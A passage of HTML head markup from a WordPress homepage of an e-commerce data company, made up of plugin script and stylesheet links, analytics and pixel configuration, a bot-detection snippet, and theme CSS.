g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://etailinsights.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-theme-css' href='https://etailinsights.com/wp-includes/css/dist/block-library/theme.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://etailinsights.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.3' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> .tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}.small-button a{letter-spacing:1px;color:#fff !important;padding:15px 40px !important;line-height:50px}.small-button a:hover{text-decoration:underline}.background-box{float:left;width:500px;height:320px;background:rgba(255,255,255,0.05)}.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902} </style> <link rel='stylesheet' id='x-stack-css' href='https://etailinsights.com/wp-content/themes/x/framework/dist/css/site/stacks/integrity-light.css?ver=6.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='x-cranium-migration-css' href='https://etailinsights.com/wp-content/themes/x/framework/legacy/cranium/dist/css/site/integrity-light.css?ver=6.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='x-child-css' href='https://etailinsights.com/wp-content/themes/x-child/style.css?ver=6.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='mc4wp-form-styles-builder-css' href='//etailinsights.com/wp-content/uploads/mc4wp-stylesheets/bundle.css?ver=1513355883' type='text/css' media='all' /> <link rel='stylesheet' id='addtoany-css' href='https://etailinsights.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.15' type='text/css' media='all' /> <link rel='stylesheet' id='lightboxStyle-css' href='https://etailinsights.com/wp-content/plugins/lightbox-plus/css/shadowed/colorbox.min.css?ver=2.7.2' type='text/css' media='screen' /> <script type='text/javascript' src='https://etailinsights.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://etailinsights.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1'></script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.3'></script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.3'></script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/cornerstone/assets/dist/js/site/cs-head.js?ver=3.5.4'></script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/pixelyoursite/dist/scripts/jquery.bind-first-0.2.3.min.js?ver=5.2'></script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/pixelyoursite/dist/scripts/js.cookie-2.1.3.min.js?ver=2.1.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var pysOptions = {"staticEvents":{"facebook":{"PageView":[{"params":[],"delay":0,"ids":[]}],"GeneralEvent":[{"params":{"post_type":"page","post_id":"12047","content_name":"New Home Page Cornerstone - DP and Dennis"},"delay":0,"ids":[]}]}},"facebook":{"pixelIds":["122028241995116"],"advancedMatching":[],"removeMetadata":false,"contentParams":{"post_type":"page","post_id":12047,"content_name":"New Home Page Cornerstone - DP and Dennis"},"commentEventEnabled":true,"wooVariableAsSimple":false,"downloadEnabled":true,"formEventEnabled":true},"ga":{"trackingIds":["UA-37087866-1"],"enhanceLinkAttr":false,"anonimizeIP":false,"commentEventEnabled":true,"commentEventNonInteractive":false,"downloadEnabled":true,"downloadEventNonInteractive":false,"formEventEnabled":true},"debug":"","siteUrl":"https:\/\/etailinsights.com","ajaxUrl":"https:\/\/etailinsights.com\/wp-admin\/admin-ajax.php","commonEventParams":{"domain":"etailinsights.com","user_roles":"guest","plugin":"PixelYourSite"},"commentEventEnabled":"1","downloadEventEnabled":"1","downloadExtensions":["","doc","exe","js","pdf","ppt","tgz","zip","xls"],"formEventEnabled":"1","gdpr":{"ajax_enabled":false,"all_disabled_by_api":false,"facebook_disabled_by_api":false,"analytics_disabled_by_api":false,"google_ads_disabled_by_api":false,"pinterest_disabled_by_api":false,"facebook_prior_consent_enabled":false,"analytics_prior_consent_enabled":true,"google_ads_prior_consent_enabled":null,"pinterest_prior_consent_enabled":true,"cookiebot_integration_enabled":false,"cookiebot_facebook_consent_category":"marketing","cookiebot_analytics_consent_category":"statistics","cookiebot_google_ads_consent_category":null,"cookiebot_pinterest_consent_category":"marketing","ginger_integration_enabled":false,"cookie_notice_integration_enabled":false,"cookie_law_info_integration_enabled":false},"woo":{"enabled":false,"addToCartOnButtonEnabled":false,"addToCartOnButtonValueEnabled":false,"addToCartOnButtonValueOption":"price","removeFromCartEnabled":true,"removeFromCartSelector":".cart .product-remove .remove"},"edd":{"enabled":false,"addToCartOnButtonEnabled":false,"addToCartOnButtonValueEnabled":false,"addToCartOnButtonValueOption":"price","removeFromCartEnabled":true}}; /* ]]> */ </script> <script type='text/javascript' src='https://etailinsights.com/wp-content/plugins/pixelyoursite/dist/scripts/public.js?ver=7.0.2'></script> <link rel='https://api.w.org/' href='https://etailinsights.com/wp-json/' /> <link rel='shortlink' href='https://etailinsights.com/' /> <link rel="alternate" type="application/json+oembed" href="https://etailinsights.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fetailinsights.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://etailinsights.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fetailinsights.com%2F&#038;format=xml" /> <script data-cfasync="false"> window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={}; (function(d,s,a,b){a=d.createElement(s);b=d.getElementsByTagName(s)[0];a.async=1;a.src="https://static.addtoany.com/menu/page.js";b.parentNode.insertBefore(a,b);})(document,"script"); </script> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//etailinsights.com/?wordfence_lh=1&hid=6D099C1B083867C4CF5DC8C097F49606'); </script><meta name="generator" content="Powered by Slider Revolution 5.4.8.3 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <style type="text/css" id="wp-custom-css"> .x-navbar .desktop .x-nav>li { cursor: pointer; } </style> <style id="x-generated-css">a,h1 a:hover,h2 a:hover,h3 a:hover,h4 a:hover,h5 a:hover,h6 a:hover,.x-breadcrumb-wrap a:hover,.widget ul li a:hover,.widget ol li a:hover,.widget.widget_text ul li a,.widget.widget_text ol li a,.widget_nav_menu .current-menu-item > a,.x-accordion-heading .x-accordion-toggle:hover,.x-comment-author a:hover,.x-comment-time:hover,.x-recent-posts a:hover .h-recent-posts{color:rgb(232,126,4);}a:hover,.widget.widget_text ul li a:hover,.widget.widget_text ol li a:hover,.x-twitter-widget ul li a:hover{color:rgb(158,158,158);}.rev_slider_wrapper,a.x-img-thumbnail:hover,.x-slider-container.below,.page-template-template-blank-3-php .x-slider-container.above,.page-template-template-blank-6-php .x-slider-container.above{border-color:rgb(232,126,4);}.entry-thumb:before,.x-pagination span.current,.flex-direction-nav a,.flex-control-nav a:hover,.flex-control-nav a.flex-active,.mejs-time-current,.x-dropcap,.x-skill-bar .bar,.x-pricing-column.featured h2,.h-comments-title small,.x-entry-share .x-share:hover,.x-highlight,.x-recent-posts .x-recent-posts-img:after{background-color:rgb(232,126,4);}.x-nav-tabs > .active > a,.x-nav-tabs > .active > a:hover{box-shadow:inset 0 3px 0 0 rgb(232,126,4);}.x-main{width:69.536945%;}.x-sidebar{width:25.536945%;}.x-comment-author,.x-comment-time,.comment-form-author label,.comment-form-email label,.comment-form-url label,.comment-form-rating label,.comment-form-comment label,.widget_calendar #wp-calendar caption,.widget.widget_rss li .rsswidget{font-family:"Open Sans",sans-serif;font-weight:400;}.p-landmark-sub,.p-meta,input,button,select,textarea{font-family:"Open Sans",sans-serif;}.widget ul li a,.widget ol li a,.x-comment-time{color:rgb(51,51,51);}.widget_text ol li a,.widget_text ul li a{color:rgb(232,126,4);}.widget_text ol li a:hover,.widget_text ul li a:hover{color:rgb(158,158,158);}.comment-form-author label,.comment-form-email label,.comment-form-url label,.comment-form-rating label,.comment-form-comment label,.widget_calendar #wp-calendar th,.p-landmark-sub strong,.widget_tag_cloud .tagcloud a:hover,.widget_tag_cloud .tagcloud a:active,.entry-footer a:hover,.entry-footer a:active,.x-breadcrumbs .current,.x-comment-author,.x-comment-author a{color:rgb(51,51,51);}.widget_calendar #wp-calendar th{border-color:rgb(51,51,51);}.h-feature-headline span i{background-color:rgb(51,51,51);}@media (max-width:979px){}html{font-size:14px;}@media (min-width:480px){html{font-size:14px;}}@media (min-width:767px){html{font-size:14px;}}@media (min-width:979px){html{font-size:14px;}}@media (min-width:1200px){html{font-size:14px;}}body{font-style:normal;font-weight:400;color:rgb(51,51,51);background-color:#f3f3f3;}.w-b{font-weight:400 !important;}h1,h2,h3,h4,h5,h6,.h1,.h2,.h3,.h4,.h5,.h6{font-family:"Open Sans",sans-serif;font-style:normal;font-weight:400;}h1,.h1{letter-spacing:-0.035em;}h2,.h2{letter-spacing:-0.035em;}h3,.h3{letter-spacing:-0.035em;}h4,.h4{letter-spacing:-0.035em;}h5,.h5{letter-spacing:-0.035em;}h6,.h6{letter-spacing:-0.035em;}.w-h{font-weight:400 !important;}.x-container.width{width:90%;}.x-container.max{max-width:1500px;}.x-main.full{float:none;display:block;width:auto;}@media (max-width:979px){.x-main.full,.x-main.left,.x-main.right,.x-sidebar.left,.x-sidebar.right{float:none;display:block;width:auto !important;}}.entry-header,.entry-content{font-size:1rem;}body,input,button,select,textarea{font-family:"Open Sans",sans-serif;}h1,h2,h3,h4,h5,h6,.h1,.h2,.h3,.h4,.h5,.h6,h1 a,h2 a,h3 a,h4 a,h5 a,h6 a,.h1 a,.h2 a,.h3 a,.h4 a,.h5 a,.h6 a,blockquote{color:rgb(51,51,51);}.cfc-h-tx{color:rgb(51,51,51) !important;}.cfc-h-bd{border-color:rgb(51,51,51) !important;}.cfc-h-bg{background-color:rgb(51,51,51) !important;}.cfc-b-tx{color:rgb(51,51,51) !important;}.cfc-b-bd{border-color:rgb(51,51,51) !important;}.cfc-b-bg{background-color:rgb(51,51,51) !important;}.x-btn,.button,[type="submit"]{color:#ffffff;border-color:#ed7c0d;background-color:#ed7c0d;text-shadow:0 0.075em 0.075em rgba(0,0,0,0.5);border-radius:0.25em;}.x-btn:hover,.button:hover,[type="submit"]:hover{color:#ffffff;border-color:#ed7c0d;background-color:#ed7c0d;text-shadow:0 0.075em 0.075em rgba(0,0,0,0.5);}.x-btn.x-btn-real,.x-btn.x-btn-real:hover{margin-bottom:0.25em;text-shadow:0 0.075em 0.075em rgba(0,0,0,0.65);}.x-btn.x-btn-real{box-shadow:0 0.25em 0 0 #141516,0 4px 9px rgba(0,0,0,0.75);}.x-btn.x-btn-real:hover{box-shadow:0 0.25em 0 0 #000000,0 4px 9px rgba(0,0,0,0.75);}.x-btn.x-btn-flat,.x-btn.x-btn-flat:hover{margin-bottom:0;text-shadow:0 0.075em 0.075em rgba(0,0,0,0.65);box-shadow:none;}.x-btn.x-btn-transparent,.x-btn.x-btn-transparent:hover{margin-bottom:0;border-width:3px;text-shadow:none;text-transform:uppercase;background-color:transparent;box-shadow:none;}.x-topbar .p-info a:hover,.x-widgetbar .widget ul li a:hover{color:rgb(232,126,4);}.x-topbar .p-info,.x-topbar .p-info a,.x-navbar .desktop .x-nav > li > a,.x-navbar .desktop .sub-menu a,.x-navbar .mobile .x-nav li > a,.x-breadcrumb-wrap a,.x-breadcrumbs .delimiter{color:#e87e04;}.x-navbar .desktop .x-nav > li > a:hover,.x-navbar .desktop .x-nav > .x-active > a,.x-navbar .desktop .x-nav > .current-menu-item > a,.x-navbar .desktop .sub-menu a:hover,.x-navbar .desktop .sub-menu .x-active > a,.x-navbar .desktop .sub-menu .current-menu-item > a,.x-navbar .desktop .x-nav .x-megamenu > .sub-menu > li > a,.x-navbar .mobile .x-nav li > a:hover,.x-navbar .mobile .x-nav .x-active > a,.x-navbar .mobile .x-nav .current-menu-item > a{color:#dddddd;}.x-navbar .desktop .x-nav > li > a:hover,.x-navbar .desktop .x-nav > .x-active > a,.x-navbar .desktop .x-nav > .current-menu-item > a{box-shadow:inset 0 4px 0 0 rgb(232,126,4);}.x-navbar .desktop .x-nav > li > a{height:80px;padding-top:26px;}.x-navbar-fixed-top-active .x-navbar-wrap{margin-bottom:1px;}.x-navbar .desktop .x-nav > li ul{top:65px;;}@media (max-width:979px){.x-navbar-fixed-top-active .x-navbar-wrap{margin-bottom:0;}}body.x-navbar-fixed-top-active .x-navbar-wrap{height:80px;}.x-navbar-inner{min-height:80px;}.x-brand{margin-top:13px;font-family:"Open Sans",sans-serif;font-size:16px;font-style:normal;font-weight:300;letter-spacing:-2em;color:#272727;}.x-brand:hover,.x-brand:focus{color:#272727;}.x-navbar .x-nav-wrap .x-nav > li > a{font-family:"Open Sans",sans-serif;font-style:normal;font-weight:400;letter-spacing:-0.006em;}.x-navbar .desktop .x-nav > li > a{font-size:16px;}.x-navbar .desktop .x-nav > li > a:not(.x-btn-navbar-woocommerce){padding-left:px;padding-right:px;}.x-navbar .desktop .x-nav > li > a > span{margin-right:--0.006em;}.x-btn-navbar{margin-top:14px;}.x-btn-navbar,.x-btn-navbar.collapsed{font-size:28px;}@media (max-width:979px){body.x-navbar-fixed-top-active .x-navbar-wrap{height:auto;}.x-widgetbar{left:0;right:0;}} @import url('https://fonts.googleapis.com/css?family=Roboto');body{background:#fff;}.x-btn{font-weight:700;}.x-btn.x-btn-alt,.button.x-btn-alt,{border-color:#02aed6;background-color:#02aed6;box-shadow:0 0.25em 0 0 #0b8ead,0 4px 9px rgba(0,0,0,0.75);}.x-btn.x-btn-alt:hover,.button.x-btn-alt:hover,{border-color:#0b8ead;background-color:#0b8ead;box-shadow:0 0.25em 0 0 #097690,0 4px 9px rgba(0,0,0,0.75);}.x-navbar .desktop .x-nav > li > a:hover,.x-navbar .desktop .x-nav > .x-active > a,.x-navbar .desktop .x-nav > .current-menu-item > a {box-shadow:none;}.x-dropcap{background-color:#02aed6;}..dark-section h1,.dark-section h2,.dark-section h3,.dark-section h4,.dark-section h5,.dark-section h6,.dark-section h1 a,.dark-section h2 a,.dark-section h3 a,.dark-section h4 a,.dark-section h5 a,.dark-section h6 a{color:#fff;}.dark-section h1 a:hover,.dark-section h2 a:hover,.dark-section h3 a:hover,.dark-section h4 a:hover,.dark-section h5 a:hover,.dark-section h6 a:hover{color:#fff;opacity:0.65;}.alignleft{margin:0.35em 1.313em 2.35em 0;}.widget a{color:#02aed6;}.hubspot_home .hbspt-form{max-width:800px;margin:0 auto;}.hubspot_home .hbspt-form label {display:none;}.hubspot_home .hbspt-form .hs-form-field {width:40%;}.hbspt-form .hs-form-field {float:left;width:25%;padding:0 3px;}.hbspt-form .hs-form-field input,.hbspt-form .hs-form-field select {width:100%;}.hs-error-msgs {list-style-type:none;padding:0px;margin:0px;}.hs-error-msgs li {}.hs-error-msgs label {color:red;font-size:10px;display:block!important;}.hbspt-form .hs-button{width:20%;height:34px;line-height:15px;padding:0px;}#menu-primary-menu li.right-menu-1 {margin-left:10px;}.hubspot-form-wrap br {display:none;}.hs_submit{clear:both;display:block;text-align:center;}.hubspot_home .hs_submit {display:inline;}.et_banner_section .banner_hubspot_form .hbspt-form span {font-size:12px;}.banner_hubspot_form .hbspt-form .hs-form-field{width:50%;padding:0 15px;position:relative;}.banner_hubspot_form .hs-error-msgs label{color:red;font-size:8px;display:block!important;position:absolute;bottom:0px;line-height:0px!important;}.hs_error_rollup {display:none;}.banner_hubspot_form .hs-form-field input {height:27px;}.banner_hubspot_form .hs-form-field select {height:37px;}.wpcf7-form{margin:0;}.wpcf7.trade_show_signup p{margin-bottom:.32825em;float:left;width:24%;margin:.5%;}.x-brand{margin-top:0px;margin-right:25px;}.x-brand img{height:70px;}.x-nav-wrap.desktop{float:left;}.x-navbar .desktop .x-nav > li > a > span{padding:15px 8px;border:none;}.masthead-inline .x-navbar .desktop .sub-menu {left:0px;}.desktop .sub-menu {border:none;}.x-nav-wrap.desktop {width:90%;}.x-navbar .desktop .x-nav {width:100%;float:left;}ul#menu-primary-menu li.right-menu-1,ul#menu-primary-menu li.right-menu-2{float:right;}ul#menu-primary-menu li.right-menu-1 a span,ul#menu-primary-menu li.right-menu-2 a span{border:1px solid #ed7c0d;border-radius:6px;font-size:14px;letter-spacing:0.6px;padding:12px 15px;}ul#menu-primary-menu li.right-menu-1{margin-right:10px;}ul#menu-primary-menu li.right-menu-1 a span {background:#e87e04;color:#fff;}ul#menu-primary-menu li.right-menu-1 a span:hover{background:#fff;color:#e87e04;}ul#menu-primary-menu li.right-menu-1{margin-right:10px;}ul#menu-primary-menu li.right-menu-2 a span{color:#e87e04;}ul#menu-primary-menu li.right-menu-2 a span:hover{background:#e87e04;color:#fff;}.top_banner:after {background-color:rgba(0,0,0,0.2);}a.try_it_btn{border:1px solid #fff!important;font-weight:normal;text-transform:unset !important;}a.try_it_btn:hover{background:#e87e04!important;color:#fff!important;}.et_banner_section h2 {font-family:inherit;color:#f3f3f3!important;font-size:32px;margin-bottom:0px;padding-bottom:0px;font-weight:500;letter-spacing:1px;}.et_banner_section p {color:#f3f3f3;font-family:inherit;text-transform:uppercase;}.et_banner_section span {color:#f3f3f3;font-family:inherit;text-transform:uppercase;}.et_banner_section h2.et_banner_heading span{text-transform:uppercase;color:#f3f3f3!important;font-family:inherit;border-bottom:1px solid #f3f3f3;font-size:20px;padding-bottom:5px;}h2 span{color:#333333 !important;font-size:48px;font-weight:400;margin-bottom:4px;text-align:center;}h2{color:#333333 !important;font-size:21px;font-weight:bold;margin-bottom:4px;text-align:left;padding-bottom:10px;}h4{color:#333 !important;font-size:18px;font-weight:400;}h3{font-size:28px;font-weight:normal;padding-bottom:10px;}.sub-menu a{font-size:14px;}.contact_form_section{width:100%;max-width:800px;margin:0 auto;text-align:left;}.search_submit{background:none repeat scroll 0 0 #e87e04;border:medium none;border-radius:5px;box-shadow:none;color:#fff;padding:0px;margin-top:-5px;text-shadow:unset;width:121px!important;}.search_submit:hover{background:#1581B2;color:#fff;box-shadow:none;text-shadow:unset;}.contact_form_section input{height:36px;border-radius:3px;width:40%;}.site_btn_orange{background:#e87e04;border:1px solid #ea7104;border-radius:6px;box-shadow:none;color:#fff;font-weight:normal;text-shadow:none;}.site_btn_orange:hover{background:#1581b2;color:#fff;border:1px solid #1581b2;box-shadow:none;text-shadow:none;}.site_btn_white{background:#fff;border:1px solid #ea7104;border-radius:6px;box-shadow:none;color:#ea7104;font-weight:normal;text-shadow:none;}.site_btn_white:hover{background:#e87e04;color:#fff;border:1px solid #e87e04;box-shadow:none;text-shadow:none;}.btn-section a.x-btn{background:none repeat scroll 0 0 rgba(0,0,0,0);border:1px solid #ea7104;border-radius:6px;box-shadow:none;color:#ea7104;font-weight:normal;text-shadow:none;}.btn-section a.x-btn:hover{background:#e87e04;color:#fff;}.images3-area .x-feature-box-graphic-inner{width:100%;}.images3-area a.x-btn:hover{background:#fff;color:#e87e04;}.images3-area a.x-btn{background:#e87e04;border:1px solid #ea7104;border-radius:6px;box-shadow:none;color:#fff;font-weight:normal;text-shadow:none;}.h-widget {font-size:21px;font-weight:400;text-align:left;}.x-widget-area ul li{border:none;padding:5px 21px;text-transform:lowercase;}.widget a {color:#333333;}.widget_categories a {margin:0px!important;padding:0px!important;}.widget ul li:first-child,.widget ol li:first-child{border:none;}ul#menu-footer{}.x-colophon.bottom {}p.copyright{}.x-colophon.bottom .x-colophon-content{}.x-colophon.bottom .x-nav li a{}.widget_categories ul {border:none;}.widget_widget_tptn_pop ul{border:none;}.widget.widget_recent_entries li{padding:0 0 15px 0;border:none!important;box-shadow:none;}.widget.widget_recent_entries li a{display:block;border-bottom:0 !important;font-size:16px;font-weight:normal;line-height:22px;}.widget ul,.widget ol {border:none;box-shadow:none;}.widget ul li:hover,.widget ol li:hover {background-color:transparent;}.x-widget-area ul li{border:none;padding:5px 0px;box-shadow:none;}#x-section-6 .widget_categories ul li a{color:inherit;border:none;}.inner_page_top_title span{color:#fff;font-weight:bold;}.inner_page_top_title strong{color:#fff;font-size:32px;margin-top:15px;width:100%;float:left;font-weight:normal;}.entry-content{margin-top:1%;}h1.entry-title {color:#e87e04;font-size:50px;font-weight:normal;}h1 span {color:#e87e04;font-size:50px;font-weight:normal;}.call_us{font-size:22px;font-weight:bold;}.call_us a{color:#e87e04;}.request_btn_section p{margin:0px;padding-top:8px;}.request_btn_section a.x-btn{background:transparent;border:1px solid #fff;border-radius:6px;box-shadow:none;color:#fff;font-weight:normal;text-shadow:none;}.request_btn_section a.x-btn:hover{background:#199CD8;color:#fff;border:1px solid #fff}.site_color{color:#e87e04;}.blue_hover:hover{background:#199CD8;color:#fff;border:1px solid #fff;}.iner_page_top_banner_btn{background:transparent;border:1px solid #fff;color:#fff;box-shadow:none;text-shadow:none;font-weight:normal;margin-top:50px;}.iner_page_top_banner_btn:hover{background:#199CD8;border:1px solid #fff;color:#fff;box-shadow:none;text-shadow:none;}.iner_page_top_banner_btn_main{background:#e87e04;border:1px solid #e87e04;color:#fff;box-shadow:none;border-radius:10px;text-shadow:none;font-weight:normal;margin-top:10px;}.iner_page_top_banner_btn_main:hover{background:transparent;border:1px solid #e87e04;color:#e87e04;box-shadow:none;text-shadow:none;}.blue_btn{background:#1581B2;border:1px solid #1581B2;color:#fff;box-shadow:none;border-radius:10px;text-shadow:none;font-weight:normal;}.blue_btn:hover{background:#1581B2;border:1px solid #1581B2;color:#fff;box-shadow:none;text-shadow:none;}.our-team h2{color:#ed7c0d!important;font-size:26px!important;}.our-team .x-column{margin-right:0px;}.company_logo .x-feature-box-graphic-inner {width:215px;}h1.contact_page_banner_text span strong{color:#fff;font-size:38px;}h1.contact_page_banner_text{margin-top:3px;}.contact_main_form{width:100%;float:left;}.contact_left_section{width:48%;float:left;}.contact_right_section{width:48%;float:left;margin-left:20px;}.radio_btn_section{width:100%;float:left;}.contact_main_form label{color:#9e9e9e;font-size:16px;}.contact_left_section span {color:#9e9e9e;font-size:16px;}.wpcf7-response-output{float:left;}.contact_main_form .wpcf7-not-valid{border:1px solid red;}.contact_main_form .wpcf7-not-valid-tip{color:red;font-weight:normal;font-size:12px;}.contact_main_form .wpcf7-submit {background:#e87e04;border:1px solid #ea7104;border-radius:6px;box-shadow:none;color:#fff;font-weight:normal;text-shadow:none;}.contact_main_form em{color:red;}h1.top_10_heading span{color:#fff;}.icon_img_top_40_top {width:23px;height:22px;}.icon_img_top_40 {width:54px;}.all_40_links h2{margin:15px 0px;padding:0px;}.all_40_links h2 a {color:#ff6600;font-size:16px;font-weight:normal;margin:0 8px 0 3px;}.all_40_links h2 span {font-size:16px;}h2.download_heading span{font-size:24px;}.page_40 p{width:auto;float:left;margin-right:10px;}.page_40 label{width:auto;float:left;}.page_40 input {width:auto;height:auto;padding:4px 5px;margin-left:10px;}.top_40_inner_top h2{text-align:center;color:#fff!important;font-weight:500;}.top_40_inner_top p{font-size:16px;}h2.left_title_40 span{font-size:26px;}.subscribe_form_40 {background:#6DB4F2;padding:2px 20px;}.subscribe_form_40 input {border:1px solid rgba(0,0,0,0.1);border-radius:4px;color:#444;font-size:12px;font-weight:400;outline:medium none;padding:10px;}.subscribe_form_40 input[type="submit"],.subscribe_form_40 input[type="button"]{background:none repeat scroll 0 0 #e87e04;border:1px solid transparent;border-radius:4px;box-shadow:none;color:#fff;display:inline-block;font-size:12px;font-weight:400;letter-spacing:1px;line-height:40px;outline:medium none;padding:0 20px;text-shadow:none;text-transform:uppercase;}.bottom_of_40pages {background:url('https://etailinsights.com/wp-content/uploads/2017/02/bottom_bg.png')no-repeat;}.bottom_of_40pages h2 span{color:#fff!important;font-size:24px;line-height:26px;}.bottom_of_40pages h2 {line-height:26px;}.x-header-landmark {display:none;}.blog .entry-title{font-size:18px;line-height:38px;position:relative;text-align:left;width:100%;font-family:verdana;color:#EA7104!important;}.blog .entry-content{margin-top:.8em;}.single .entry-title{}.single .entry-content {padding:0 2%;text-align:left;}.single .entry-content h1{font-size:19px;font-weight:bold;font-family:verdana;}.tptn_counter{display:none;}input#entry-comment-submit{background:#EA7104;border:1px solid #EA7104;border-radius:6px;box-shadow:none;color:#fff;font-weight:normal;text-shadow:none;}input#entry-comment-submit:hover{background:#199CD8;color:#fff;border:1px solid #fff}.widget_categories ul li a{color:#EA7104;}.case_main{padding:20px;margin:0 auto;border:1px solid #bbbec9;}.fancy_title{margin-left:5px;margin-top:14px;}.case_main .case_a_tag{background:none repeat scroll 0 0 #fff;border:3px solid #ed7c0d;margin-top:25px;padding:10px;text-decoration:none !important;}.map_section .with-container{padding:0px;}.orange{color:#ed7c0d;}.sign_up_btn {background-color:transparent;border:1px solid 